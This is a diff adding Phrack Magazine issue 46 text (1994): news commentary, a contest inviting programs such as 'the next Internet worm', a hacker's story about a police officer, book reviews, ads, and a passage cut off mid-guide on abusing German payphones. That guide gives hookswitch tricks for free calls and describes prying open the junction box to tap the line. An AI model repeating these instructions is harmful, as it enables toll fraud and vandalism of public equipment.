+Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
+Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
+users' groups. These included one run by the Cambridge, Mass.-based
+Electronic Frontier Foundation, which fights to protect free speech on
+computer networks.
+
+Ward said he helped redistribute the NSA manual "to embarrass the NSA"
+and prove that even the U.S. government's most covert agency can't keep
+documents secret.
+
+The action also was aimed at undermining a federal push for
+data-encryption regulations that would let the government tap into computer
+networks, Ward said.
+
+[Yeah...sure it was, Grady.]
+------------------------------------------------------------------------------
+
+Hackers Stored Pornography in Computers at Weapons Lab           July 13, 1994
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6)
+
+One of the nation's three nuclear weapons labs has confirmed that
+computer hackers were using its computers to store and distribute
+hard-core pornography.
+
+The offending computer, which was shut down after a Los Angeles Times
+reporter investigating Internet hacking alerted lab officials, contained
+more than 1,000 pornographic images.  It was believed to be the largest
+cache of illegal hardcore pornography ever found on a computer network.
+
+At Lawrence Livermore, officials said Monday that they believed at least
+one lab employee was involved in the pornography ring, along with an
+undetermined number of outside collaborators.
+
+[Uh, let me see if I can give this one a go:
+
+ A horny lab technician at LLNL.GOV uudecoded gifs for days on end
+ from a.b.p.e.  After putting them up on an FSP site, a nosey schlock
+ reporter blew the whistle, and wrote up a big "hacker-scare" article.
+
+ The top-notch CIAC team kicked the horn-dog out the door, and began
+ frantically scouring the big Sun network at LLNL for other breaches,
+ all the while scratching their heads at how to block UDP-based apps
+ like FSP at their firewall.  MPEGs at 11.
+
+ How does shit like this get printed????]
+
+------------------------------------------------------------------------------
+
+Clipper Flaw May Thwart Fed Effort                                June 6, 1994
+by Aaron Zitner (Boston Globe)
+
+Patents, Technical Snares May Trip Up the 'Clipper'               June 6, 1994
+by Sharon Fisher (Communications Week) (Page 1)
+
+[Clipper, Flipper, Slipper.  It's all a big mess, and has obsoleted
+itself.  But, let's sum up the big news:
+
+ How the Clipper technology is SUPPOSED to work
+
+ 1) Before an encoded message can be sent, a clipper computer chip
+ assigns and tests a scrambled group of numbers called a LEAF, for
+ Law Enforcement Access Field.  The LEAF includes the chip's serial
+ number, a "session key" number that locks the message and a "checksum"
+ number that verifies the validity of the session key.
+
+ 2) With a warrant to wiretap, a law-enforcement agency like the FBI
+ could record the message and identify the serial number of a Clipper
+ chip.  It would then retrieve from custodial agencies the two halves of
+ that chip's decoding key.
+
+ 3) Using both halves of the decoding key, the FBI would be able to
+ unscramble the session key number, thus unlocking the messages or data
+ that had been protected.
+
+ How the Clipper technology is FLAWED  (YAY, Matt Blaze!)
+
+ 1) Taking advantage of design imperfections, people trying to defeat
+ the system could replace the LEAF until it erroneously passed the
+ "checksum" verification, despite an invalid session-key number.
+
+ 2) The FBI would still be able to retrieve a decoding key, but it would
+ prove useless.
+
+ 3) Because the decoding key would not be able to unscramble the invalid
+ session key, the message would remain locked.]
diff --git a/phrack46/3.txt b/phrack46/3.txt
new file mode 100644
index 0000000..7cadbf7
--- /dev/null
+++ b/phrack46/3.txt
@@ -0,0 +1,1247 @@
+                         ==Phrack Magazine==
+
+              Volume Five, Issue Forty-Six, File 3 of 28
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART I
+
+------------------------------------------------------------------------------
+
+                        !! NEW PHRACK CONTEST !!
+
+Phrack Magazine is sponsoring a programming contest open to anyone
+who wishes to enter.
+
+Write the Next Internet Worm!  Write the world's best X Windows wardialer!
+Code something that makes COPS & SATAN look like high school Introduction
+to Computing assignments.  Make the OKI 1150 a scanning, tracking, vampire-
+phone.  Write an NLM!  Write a TSR!  Write a stupid game!  It doesn't
+matter what you write, or what computer it's for!  It only matters that you
+enter!
+
+Win from the following prizes:
+
+     Computer Hardware & Peripherals
+     System Software
+     Complete Compiler packages
+     CD-ROMS
+     T-Shirts
+     Magazine Subscriptions
+     and MANY MORE!
+
+STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
+
+Enter the PHRACK PROGRAMMING CONTEST!
+
+The rules are very simple:
+
+1)  All programs must be original works.  No submissions of
+    previously copyrighted materials or works prepared by
+    third parties will be judged.
+
+2)  All entries must be sent in as source code only.  Any programming
+    language is acceptable.  Programs must compile and run without
+    any modifications needed by the judges.  If programs are specific
+    to certain platforms, please designate that platform.  If special
+    hardware is needed, please specify what hardware is required.
+    If include libraries are needed, they should be submitted in addition
+    to the main program.
+
+3)  No virii accepted.  An exception may be made for such programs that
+    are developed for operating systems other than AMIGA/Dos, System 7,
+    MS-DOS (or variants), or OS/2.  Suitable exceptions could be, but are not
+    limited to, UNIX (any variant), VMS or MVS.
+
+4)  Entries may be submitted via email or magnetic media.  Email should be
+    directed to phrack@well.com.  Tapes, Diskettes or other storage
+    media should be sent to
+
+         Phrack Magazine
+         603 W. 13th #1A-278
+         Austin, TX 78701
+
+5)  Programs will be judged by a panel of judges based on programming skill
+    displayed, originality, usability, user interface, documentation,
+    and creativity.
+
+6)  Phrack Magazine will make no claims to the works submitted, and the
+    rights to the software are understood to be retained by the program
+    author.   However, by entering, the Author thereby grants Phrack Magazine
+    permission to reprint the program source code in future issues.
+
+7)  All Entries must be received by 12-31-94.  Prizes to be awarded by 3-1-95.
+
+-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
+
+Author:
+
+Email Address:
+
+Mailing Address:
+
+
+
+Program Name:
+
+
+Description:
+
+
+
+
+Hardware & Software Platform(s) Developed For:
+
+
+
+Special Equipment Needed (modem, ethernet cards, sound cards, etc):
+
+
+
+Other Comments:
+
+
+------------------------------------------------------------------------------
+                             COMPUTER COP PROPHILE
+                               FOLLOW-UP REPORT
+
+                               LT. WILLIAM BAKER
+                           JEFFERSON COUNTY POLICE
+
+                                     by
+
+                                The Grimmace
+
+
+ In PHRACK 43, I wrote an article on the life and times
+of a computer cop operating out of the Jefferson County Police
+Department in Louisville, Kentucky.  In the article, I included
+a transcript of a taped interview with him that I did after
+socially engineering my way through the cop-bureaucracy in his
+department. At the time I thought it was a hell of an idea and a
+lot of PHRACK readers probably got a good insight into how the
+"other side" thinks.
+
+ However, I made the terminal mistake of underestimating
+the people I was dealing with by a LONG shot and felt that I
+should write a short follow-up on what has transpired since that
+article was published in PHRACK 43.
+
+ A lot of the stuff in the article about Lt. Baker was
+obtained by an attorney I know who has no reason to be friendly
+to the cops.  He helped me get copies of court transcripts which
+included tons of information on Baker's training and areas of
+expertise.  Since the article, the attorney has refused to talk
+to me and, it appears, that he's been identified as the source
+of assistance in the article and all he will say to me is that
+"I don't want any more trouble from that guy...forget where you
+left my phone number."  Interesting...no elaboration...hang up.
+
+ As I recall, the PHRACK 43 issue came out around
+November 17th.  On November 20th, I received a telephone call
+where I was living at the home of a friend of mine from Lt.
+Baker who laughingly asked me if I needed any more information
+for any "future articles".  I tried the "I don't know what
+you're talking about" scam at which time he read to me my full
+name, date of birth, social security number, employer, license
+number of my car, and the serial number from a bicycle I just
+purchased the day before.  I figured that he'd run a credit
+history on me, but when I checked, there had been no inquiries
+on my accounts for a year.  He told me the last 3 jobs I'd held
+and where I bought my groceries and recited a list of BBSs I was
+on (two of which under aliases other than The Grimmace).
+
+ This guy had a way about him that made a chill run up my
+spine and never once said the first threatening or abusive thing
+to me. I suppose I figured that the cops were all idiots and
+that I'd never hear anything more about the article and go on to
+write some more about other computer cops using the same method.
+I've now decided against it.
+
+ I got the message...and the message was "You aren't the
+only one who can hack out information."  I'd always expected to
+get the typical "cop treatment" if I ever got caught doing
+anything, but I think this was worse.  Hell, I never know where
+the guy's gonna show up next.  I've received cryptic messages on
+the IRC from a variety of accounts and servers all over the
+country and on various "private" BBSs and got one on my birthday
+on my Internet account...it traced back to an anonymous server
+somewhere in the bowels of UCLA.  I don't know anyone at UCLA
+and the internet account I have is an anonymous account actually
+owned by another friend of mine.
+
+ I think the point I'm trying to make is that all of us
+have to be aware of how the cops think in order to protect
+ourselves and the things we believe in.  But...shaking the
+hornet's nest in order to see what comes out maybe isn't the
+coolest way to investigate.
+
+ Like I wrote in my previous article, we've all gotten a
+big laugh from keystone cops like Foley and Golden, but things
+may be changing.  Local and federal agencies are beginning to
+cooperate on a regular basis and international agencies are also
+beginning to join the party.
+
+ The big push to eradicate child-pornography has led to a number of
+hackers being caught in the search for the "dirty old men" on the Internet.
+Baker was the Kentucky cop who was singularly responsible for the bust of the
+big kiddie-porn FSP site at the University of Birmingham in England back
+in April and got a lot of press coverage about it.  But I had personally
+never considered that a cop could hack his way into a password-protected
+FSP site.  And why would he care about something happening on the other
+side of the world?  Hackers do it, but not cops...unless the cops are
+hackers.  Hmmm...theories anyone?
+
+ I don't live in Louisville anymore...not because of
+Baker, but because of some other problems, but I still look over
+my shoulder.  It would be easier if the guy was a prick, but I'm
+more paranoid of the friendly good-ole boy than the raving
+lunatic breaking in our front doors with a sledge hammer.  I
+always thought we were safe because we knew so much more than
+the people chasing us.  I'm not so certain of that anymore.
+
+ So that's it.  I made the mistakes of 1) probably
+embarrassing a guy who I thought would never be able to touch me
+and 2), drawing attention to myself.  A hacker's primary
+protection lies in his anonymity...those who live the high
+profiles are the ones who take the falls and, although I haven't
+fallen yet, I keep having the feeling that I'm standing on the
+edge and that I know the guy sneaking up behind me.
+
+From the shadows--
+   The Grimmace
+                      [HsL - RAt - UQQ]
+
+------------------------------------------------------------------------------
+
+                              !! PHRACK READS  !!
+
+                         "Cyberia" by Douglas Rushkoff
+                            Review by Erik Bloodaxe
+
+Imagine a book about drugs written by someone who never inhaled.
+Imagine a book about raves written by someone saw a flyer once.
+Imagine a book about computers by someone who someone who thinks
+     a macintosh is complex.
+
+Imagine an author trying to make a quick buck by writing about something
+     his publisher said was hot and would sell.
+
+And there you have Cyberia, by Douglas Rushkoff.
+
+I have got to hand it to this amazing huckster Rushkoff, though.  By
+publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
+(which by the way is unequaled in its insipidness), he has covered all
+bases for the idiot masses to devour at the local bookseller.
+
+Rushkoff has taken it upon himself to coin new terms such as
+"Cyberia," the electronic world we live in; "Cyberians," the people
+who live and play online; etc...
+
+Like we needed more buzzwords to add to a world full of "Infobahns"
+"console cowboys," and "phrackers."  Pardon me while I puke.
+
+The "interviews" with various denizens of Rushkoff's "Cyberia" come off
+as fake as if I were to attempt to publish an interview with Mao Tse Tung
+in the next issue of Phrack.
+
+We've got ravers talking on and on about "E" and having deep conversations
+about smart drugs and quantum physics.  Let's see:  in the dozens of raves
+I've been to in several states the deepest conversation that popped
+up was "uh, do you have any more of that acid?" and "this mix is cool."
+And these conversations were from the more eloquent of the nearly all under
+21 crowd that the events attracted.  Far from quantum physicians.
+And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
+through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
+in the early 80's with my fake id and bought a pouch of the magic elixir over
+the counter from the bartender (complete with printed instructions).
+NOT "E."  But that's just nit-picking.
+
+Now we have the psychedelic crowd.  Listening to the "Interviews" of these
+jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
+"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
+harder drugs such as LSD."  That's not a quote from the book, but it may
+as well be.  People constantly talk about "LSD-this" and "LSD-that."
+Hell, if someone walked into a room and went on about how he enjoyed his
+last "LSD experience" the way these people do, you'd think they were
+really really stupid, or just a cop.  "Why no, we've never had any of
+that acid stuff.  Is it like LSD?"  Please.
+
+Then there are the DMT fruitcakes.  Boys and girls, DMT isn't being sold
+on the street corner in Boise.  In fact, I think it would be easier for most
+people to get a portable rocket launcher than DMT.  Nevertheless, in every
+fucking piece of tripe published about the "new psychedlicia" DMT is
+splattered all over it.  Just because Terrance Fucking McKenna
+saw little pod people, does not mean it serves any high position
+in the online community.
+
+And Hackers?  Oh fuck me gently with a chainsaw, Douglas.  From Craig Neidorf's
+hacker Epiphany while playing Adventure on his Atari VCS to Gail
+Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
+was raided for the 3rd time.  PLEASE!  I'm sure Gail was up to her eyebrows
+in bourbon, wearing a party hat and prank calling hackers saying "You're next,
+my little pretty!"  Not looking for 3rd-rate schlock journalists to whine to.
+
+The Smart Drink Girl?  The Mondo House?  Gee...how Cyber.  Thanks, but
+no thanks.
+
+I honestly don't know if Rushkoff really experienced any of this nonsense,
+or if he actually stumbled on a few DMT crystals and smoked this
+reality.  Let's just say, I think Mr. Rushkoff was absent the day
+his professor discussed "Creative License in Journalism" and just decided
+to wing it.
+
+Actually, maybe San Francisco really is like this.  But NOWHERE else on
+the planet can relate.  And shit, if I wanted to read a GOOD San
+Francisco book, I'd reread Armistead Maupin's "Tales of the City."
+This book should have been called "Everything I Needed to Know About
+Cyber-Culture I Learned in Mondo-2000."
+
+Seriously...anyone who reads this book and finds anything remotely
+close to the reality of the various scenes it weakly attempts to
+cover needs to email me immediately.  I have wiped my ass with
+better pulp.
+
+------------------------------------------------------------------------------
+
+                    BOOK REVIEW:  INFORMATION WARFARE
+                   CHAOS ON THE ELECTRONIC SUPERHIGHWAY
+                            By Winn Schwartau
+
+ INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
+ By Winn Schwartau.  (C)opyright 1994 by the author
+ Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
+ ISBN 1-56025-080-1 - Price $22.95
+ Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
+ (800) 788-3123
+
+ Review by Scott Davis (dfox@fennec.com)
+ (from tjoauc1-4  ftp: freeside.com /pub/tjoauc)
+
+ If you only buy one book this year, make sure it is INFORMATION WARFARE!
+ In my 10+ years of existing in cyberspace and seeing people and organizations
+ debate, argue and contemplate security issues, laws, personal privacy,
+ and solutions to all of these issues...and more, never have I seen a more
+ definitive publication. In INFORMATION WARFARE,  Winn Schwartau simply
+ draws the line on the debating. The information in this book is hard-core,
+ factual documentation that leaves no doubt in this reader's mind that
+ the world is in for a long, hard ride in regards to computer security.
+ The United States is open to the world's electronic terrorists.
+ When you finish reading this book, you will find out just how open we are.
+
+ Mr. Schwartau talks about industrial espionage, hacking, viruses,
+ eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
+ magnetic weaponry, and the newest phrase of our generation...
+ "Binary Schizophrenia". He exposes these topics from all angles. If you
+ spend any amount of time in Cyberspace, this book is for you.
+
+ How much do you depend on technology?
+
+ ATM machines, credit cards, toasters, VCR's, televisions, computers,
+ telephones, modems...the list goes on. You use technology and computers
+ and don't even know it! But the point is...just how safe are you from
+ invasion? How safe is our country's secrets? The fact is - they are NOT
+ SAFE! How easy is it for someone you don't know to track your every move
+ on a daily basis? VERY EASY! Are you a potential victim to fraud,
+ breech of privacy, or general infractions against the way you carry
+ on your daily activities?  YES! ...and you'd never guess how vulnerable
+ we all are!
+
+ This book will take you deep into places the government refuses to
+ acknowledge. You should know about INFORMATION WARFARE. Order your
+ copy today, or pick it up at your favorite book store. You will not
+ regret it.
+
+------------------------------------------------------------------------------
+
+      _Firewalls and Internet Security: Repelling the Wily Hacker_
+
+              William R. Cheswick <ches@research.att.com>
+               Steven M. Bellovin <smb@research.att.com>
+
+                   Addison-Wesley, ISBN 0-201-63357-4
+                         306 + XIV = 320 pages
+                      (Printed on recycled paper)
+
+                  A-Somewhat-Less-Enthusiastic-Review
+
+                         Reviewed by Herd Beast
+
+The back of this book claims that, "_Firewalls and Internet Security_
+gives you invaluable advice and practical tools for protecting your
+organization's computers from the very real threat of hacker attacks."
+That is true.  The authors also add something from their knowledge of
+these hacker attacks.  The book can be roughly separated into two
+parts: Firewalls, and, you guessed it: Internet Security.  That is
+how I see it.  The book itself is divided into four parts (Getting
+Started, Building Your Own Firewall, A Look Back & Odds and Ends),
+three appendixes, a bibliography, a list of 42 bombs and an index.
+
+The book starts with overall explanations and an overview of the
+TCP/IP protocol.  More than an overview of the actual TCP/IP protocol,
+it is a review of services often used with that protocol, and the
+security risks they pose.  In that chapter the authors define
+"bombs" -- as particularly serious security risks.  Despite that fact,
+and the tempting bomb list in the end, this book is not a guide for
+someone with passing knowledge of Internet security who wants to learn
+more explicit details about holes.  It is, in the authors' words, "not
+a book on how to administer a system in a secure fashion."
+
+
+FIREWALLS (Including the TCP/IP overview: pages 19-131)
+
+What is a firewall and how is it built?(*)  If you don't know that,
+then definitely get this book.  The Firewalls chapter is excellent
+even for someone with a passing knowledge of firewalls or general
+knowledge of what they set out to accomplish.  You might still
+learn more.
+
+In the Firewalls chapter, the authors explain the firewall philosophy
+and types of firewalls.  Packet-filtering gateways rely on rule-based
+packet filtering to protect the gateway from various types of attacks.
+You can filter everything and achieve the same effect of disconnecting
+from the Internet, you can filter everything from misbehaving sites,
+you can allow only mail in, and so on.  An application-level gateway
+relies on the applications set on the firewall.  Rather then let a
+router filter traffic based on rules, one can strip a machine clean
+and only run desired services -- and even then, more secure versions
+of those services can be run.  Circuit-level gateways relay data
+between the gateway and other networks.  The relay programs copy
+data from inside the firewall to the outside, and log their activity.
+Most firewalls on the Internet are a combination of these gateways.
+
+Next, the authors explain how to build an application-level gateway
+based on the work they have done with the research.att.com gateways.
+As mentioned, this chapter is indeed very good.  They go over setting
+up the firewall machines, router configuration for basic packet
+filtering (such as not allowing Internet packets that appear to come
+from inside your network).  They show, using the software on the
+AT&T gateway as example, the general outline of proxies and give some
+useful advise.  That chapter is very interesting; reading it with Bill
+Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
+it even better.  The examples given, like the NFS and X proxies run on the
+gateway, are also interesting by themselves.
+
+
+INTERNET SECURITY (pages 133-237)
+
+Internet security is a misleading name.  This part might also be
+called "Everything else."  Most of it is a review of hacker attacks
+logged by AT&T's gateway probes, and of their experience with a hacker.
+But there is also a chapter dedicated to computer crime and the law --
+computer crime statutes, log files as evidence, the legalities of
+monitoring intruders and letting them keep their access after finding
+them, and the ethics of many actions performed on the Internet; plus
+an introduction to cryptography under Secure Communication over Insecure
+Networks.  The later sections are good.  The explanation of several
+encryption methods and short reviews of applications putting them to use
+(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
+computer crime sections are also good -- although I'm not a lawyer and
+therefore cannot really comment on it, and notes that look like "5 USC
+552a(b)(c)(10)" cause me to shudder.  It's interesting to note that some
+administrative functions as presented in this book, what the authors call
+counter-intelligence (reverse fingers and rusers) and booby traps and fake
+password file are open for ethical debate.  Perhaps they are not illegal,
+but counter-intelligence can surely ring the warning bells on the site being
+counter-fingered if that site itself is security aware.
+
+That said, let's move to hackers.  I refer to these as "hacker studies",
+or whatever, for lack of a better name.  This is Part III (A Look
+Back), which contains the methods of attacks (social engineering,
+stealing passwords, etc), the Berferd incident (more on that later),
+and an analysis (statistical and otherwise) of the Bell Labs gateway
+logs.
+
+Back to where we started, there is nothing new or innovative about
+these chapters.  The Berferd hacker case is not new, it is mostly just
+uninteresting.  The chapter is mostly a copy (they do state this) of
+Bill Cheswick's paper titled "A Night with Berferd, in Which a Cracker
+is Lured, Endured and Studied."  The chapter concerning probes and
+door-knob twisting on the Internet (Traps, Lures, and Honey Pots)
+is mostly a copy (they do not state this) of Steven Bellovin's paper
+titled, "There Be Dragons".  What do we learn from the hacker-related
+chapters?  Let's take Berferd: The Sendmail DEBUG hole expert.  After
+mailing himself a password file and receiving it with a space after
+the username, he tries to add accounts in a similar fashion.  Cheswick
+calls him "flexible".  I might have chosen another F-word.  Next are
+the hacker logs.  People finger.  People tftp /etc/passwd.  People try
+to rlogin as bin.  There are no advanced attacks in these sections.
+Compared with the scary picture painted in the Firewalls chapter --
+that of the Bad Guy spoofing hostnames, flooding DNS caches, faking
+NFS packets and much more -- something must have gone wrong.(**)
+
+Still, I cannot say that this information is totally useless.  It is,
+as mentioned, old.  It is available and was available since 1992
+on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***)
+
+The bottom line is that this book is, in my opinion, foremost and upmost
+a Firewaller's book.  The hacker section could have been condensed
+into Appendix D, a copy of the CERT advisory about computer attacks
+("Don't use guest/guest.  Don't leave root unpassworded.")  It really
+takes ignorance to believe that inexperienced hackers can learn "hacker
+techniques" and become mean Internet break-in machines just by reading
+_Firewalls and Internet Security_.  Yes, even the chapter dedicated
+to trying to attack your own machine to test your security (The Hacker's
+Workbench) is largely theoretical.  That is to say, it doesn't go above
+comments like "attack NFS".  The probes and source code supplied there are
+for programs like IP subnet scanners and so on, and not for "high-level"
+stuff like ICMP bombers or similar software; only the attacks are
+mentioned, not to implementation.  This is, by the way, quite
+understandable and expected, but don't buy this book if you think it
+will make you into some TCP/IP attacker wiz.
+
+In summary:
+
+THE GOOD
+
+The Firewalls part is excellent.  The other parts not related to
+hacker-tracking are good as well.  The added bonuses -- in the form
+of a useful index, a full bibliography (with pointers to FTP sites),
+a TCP port list with interesting comments and a great (running out
+of positive descriptions here) online resources list -- are also
+grand (whew).
+
+THE BAD
+
+The hacker studies sections, based on old (circa 1992) papers, are
+not interesting for anyone with any knowledge of hacking and/or
+security who had some sort of encounters with hackers.  People without
+this knowledge might either get the idea that: (a) all hackers are
+stupid and (b) all hackers are Berferd-style system formatters.  Based on
+the fact that the authors do not make a clear-cut statement about
+hiring or not hiring hackers, they just say that you should think
+if you trust them, and that they generally appear not to have a total
+draconian attitude towards hackers in general, I don't think this was
+intentional.
+
+THE UGLY (For the nitpickers)
+
+There are some nasty little bugs in the book.  They're not errors
+in that sense of the word; they're just kind of annoying -- if you're
+sensitive about things like being called a hacker or a cracker, they'll
+annoy you.  Try this: although they explain why they would use the term
+"hacker" when referring to hackers (and not "eggsucker", or "cracker"),
+they often use terms like "Those With Evil Intention".  Or, comparing
+_2600 Magazine_ to the Computer underground Digest.
+
+(*) From the Firewalls FAQ <fwalls-faq@tis.com>:
+    ``A firewall is any one of several ways of protecting one
+    network from another untrusted network. The actual mechanism
+    whereby this is accomplished varies widely, but in
+    principle, the firewall can be thought of as a pair of
+    mechanisms: one which exists to block traffic, and the other
+    which exists to permit traffic. Some firewalls place a
+    greater emphasis on blocking traffic, while others emphasize
+    permitting traffic.''
+
+(**) This would be a great place to start a long and boring discussion
+     about different types of hackers and how security (including firewalls)
+     affect them.  But... I don't think so.
+
+(***) ftp://research.att.com:/dist/internet_security/firewall.book also
+      contains, in text and PostScript, the list of parts, chapters and
+      sections in the book, and the Preface section.  For that reason,
+      those sections weren't printed here.
+      All the papers mentioned in this review can be found on that FTP
+      site.
+
+------------------------------------------------------------------------------
+
+Announcing Bellcore's Electronic Information Catalog for Industry
+Clients...
+
+To access the online catalog:
+
+    telnet info.bellcore.com
+    login: cat10
+
+    or dial 201-829-2005
+       annex: telnet info
+       login: cat10
+
+[Order up some E911 Documents Online!]
+
+------------------------------------------------------------------------------
+
+TTTTT H   H EEEEE
+  T   H   H E
+  T   HHHHH EEEEE
+  T   H   H E
+  T   H   H EEEEE
+
+             CCC  U   U RRRR  M   M U   U DDDD   GGG  EEEEE  OOO  N   N
+            C   C U   U R   R MM MM U   U D   D G   G E     O   O NN  N
+            C     U   U RRRR  M M M U   U D   D G     EEEEE O   O N N N
+            C   C U   U R  R  M   M U   U D   D G  GG E     O   O N  NN
+             CCC   UUU  R   R M   M  UUU  DDDD   GGG  EEEEE  OOO  N   N
+
+       Bill Clinton promised good health care coverage for everyone.
+          Bill Clinton promised jobs programs for the unemployed.
+Bill Clinton promised that everyone who wanted could serve in the military.
+           Bill Clinton promised a lot.  So does the Curmudgeon.
+                 But unlike Bill Clinton, we'll deliver...
+
+For only $10 a year (12 issues) you'll get alternative music reviews and
+interviews, political reporting, anti-establishment features and
+commentary, short fiction, movie reviews, book reviews, and humor.  Learn
+the truth about the Gulf War, Clipper, and the Selective Service System.
+Read everything you wanted to know about bands like the Offspring, R.E.M.,
+the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and
+Nine Inch Nails.  Become indoctrinated by commentary that just might change
+the way you think about some things.  Subscribe to the Curmudgeon on paper for
+$10 or electronically for free.  Electronic subscribers don't get
+everything that paying subscribers do like photos, spoof ads, and some
+articles.
+
+Paper: send $10 check or money order to the Curmudgeon
+     4505 University Way N.E.
+     Box 555
+     Seattle, Washington
+       98105
+   Electronic: send a request to rodneyl@u.washington.edu
+
+------------------------------------------------------------------------------
+
+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+ % The Journal Of American Underground Computing - ISSN 1074-3111 %
+ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+ Computing - Communications - Politics - Security - Technology - Humor
+ -Underground - Editorials - Reviews - News - Other Really Cool Stuff-
+
+ Published Quarterly/Semi-Quarterly By Fennec Information Systems
+ This is one of the more popular new electronic publications. To
+ get your free subscription, please see the addresses below.
+ Don't miss out on this newsworthy publication. We are getting
+ hundreds of new subscriptions a month. This quarterly was promoted
+ in Phrack Magazine. If you don't subscribe, you're only cheating
+ yourself. Have a great day...and a similar tomorrow
+
+ * Coming soon * A Windows-based help file containing all of the issues
+                 of the magazine as well as extensive bio's of all of the
+                 editors.
+
+ Subscription Requests:  sub@fennec.com
+ Comments to Editors  :  editors@fennec.com
+ Back issues via Ftp  :  etext.archive.umich.edu  /pub/Zines/JAUC
+                         fc.net   /pub/tjoauc
+
+ Submissions          :  submit@fennec.com
+ Finger info          :  dfox@fc.net and kahuna@fc.net
+
+------------------------------------------------------------------------------
+
+        Make the best out of your European pay telephone
+           by Onkel Dittmeyer, onkeld@ponton.hanse.de
+
+      -----------------------------------------------------
+
+  Okay guys and girls, let's come to a topic old like the creation
+but yet never revealed. European, or, to be more exact, German pay
+phone technology. Huh-huh.
+
+  There are several models, round ones, rectangular ones, spiffy
+looking ones, dull looking ones, and they all have one thing in
+common: If they are something, they are not what the American reader
+might think of a public pay telephone, unlike it's U.S. brothers,
+the German payphones always operate off a regular customer-style
+telephone line, and therefore they're basically all COCOTS, which
+makes it a lot easier to screw around with them.
+
+  Let's get on with the models here. You are dealing with two
+classes; coin-op ones and card-op ones. All of them are made by
+Siemens and TELEKOM. The coin-op ones are currently in the process
+of becoming extinct while being replaced by the new card-op's, and rather
+dull. Lacking all comfort, they just have a regular 3x4 keypad,
+and they emit a cuckoo tone if you receive a call. The only way to
+tamper with these is pure physical violence, which is still easier
+than in the U.S.; these babies are no fortresses at all. Well, while
+the coin-op models just offer you the opportunity of ripping off
+their money by physically forcing them open, there is a lot more
+fun involved if you're dealing with the card babies. They are really
+spiffy looking, and I mean extraordinary spiffy. Still nothing
+compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line
+pixel-oriented LCD readout displays the pure K-Radness of it's
+inventors. Therefore it is equipped with a 4x4 keypad that has a lot
+of (undocumented) features like switching the mother into touch-tone
+mode, redial, display block etc. Plus, you can toggle the readout
+between German, English, and French. There are rumors that you can
+put it into Mandarin as well, but that has not been confirmed yet.
+
+  Let's get ahead. Since all payphones are operating on a regular
+line, you can call them up. Most of them have a sign reading their
+number, some don't. For those who don't, there is no way for you to
+figure out their number, since they did not invent ANI yet over here
+in the country famous for its good beer and yodel chants. Well, try
+it. I know you thought about it. Call it collect. Dialing 010 will
+drop you to a long-distance operator, just in case you didn't know.
+He will connect the call, since there is no database with all the
+payphone numbers, the payphone will ring, you pick up, the operator
+will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh?
+
+  This would not be Phrack if there would be no way to screw it.
+If you examine the hook switch on it closely, you will figure out
+that, if you press it down real slow and carefully, there are two
+levels at whom it provokes a function; the first will make the phone
+hang up the line, the second one to reset itself. Let me make this
+a little clearer in your mind.
+
+                       -----         <--- totally released
+                         |
+                         |
+                         |           <--- hang up line
+ press to this level --> |
+                         |           <--- reset
+                         |
+                       -----         <--- totally hung up
+
+  Involves a little practice, though. Just try it. Dial a number
+it will let you dial, like 0130, then it will just sit there and
+wait for you to dial the rest of the number. Start pressing down
+the hookswitch really slow till the line clicks away into suspense,
+if you release it again it will return you to the dial tone and
+you are now able to call numbers you aren't supposed to call, like
+010 (if you don't have a card, don't have one, that's not graceful),
+or 001-212-456-1111. Problem is, the moment the other party picks
+up, the phone will receive a charge subtraction tone, which is a
+16kHz buzz that will tell the payphone to rip the first charge unit,
+30 pfennigs, off your card, and if you don't have one inserted and
+the phone fails to collect it, it will go on and reset itself
+disconnecting the line. Bad luck. Still good enough to harass your
+favorite fellas for free, but not exactly what we're looking for,
+right? Try this one. Push the hook lever to the suspension point,
+and let it sit there for a while, you will have to release it a
+bit every 5 seconds or so, or the phone will reset anyway. If you
+receive a call while doing this, a buzz will appear on the line.
+
+  Upon that buzz, let the lever go and you'll be connected, and
+the cuckoo tone will be shut up! So if you want to receive a collect
+call, this is how you do it. Tell the operator you accept the charges,
+and talk away. You can use this method overseas, too: Just tell your
+buddy in the states to call Germany Direct (800-292-0049) and make
+a collect call to you waiting in the payphone, and you save a cool
+$1.17 a minute doing that. So much for the kids that just want to
+have some cheap fun, and on with the rest.
+
+  Wasting so much time in that rotten payphone, you probably
+noticed the little black box beneath the phone. During my, erm,
+research I found out that this box contains some fuses, a standard
+Euro 220V power connector, and a TAE-F standard phone connector.
+Completing the fun is the fact that it's extremely easy to pry it
+open. The TAE-F plug is also bypassing the phone and the charge
+collection circuits, so you can just use it like your jack at home.
+Bring a crowbar and your laptop, or your Pentium tower, power it over
+the payphone and plug your Dual into the jack. This way you can even
+run a board from a payphone, and people can download the latest
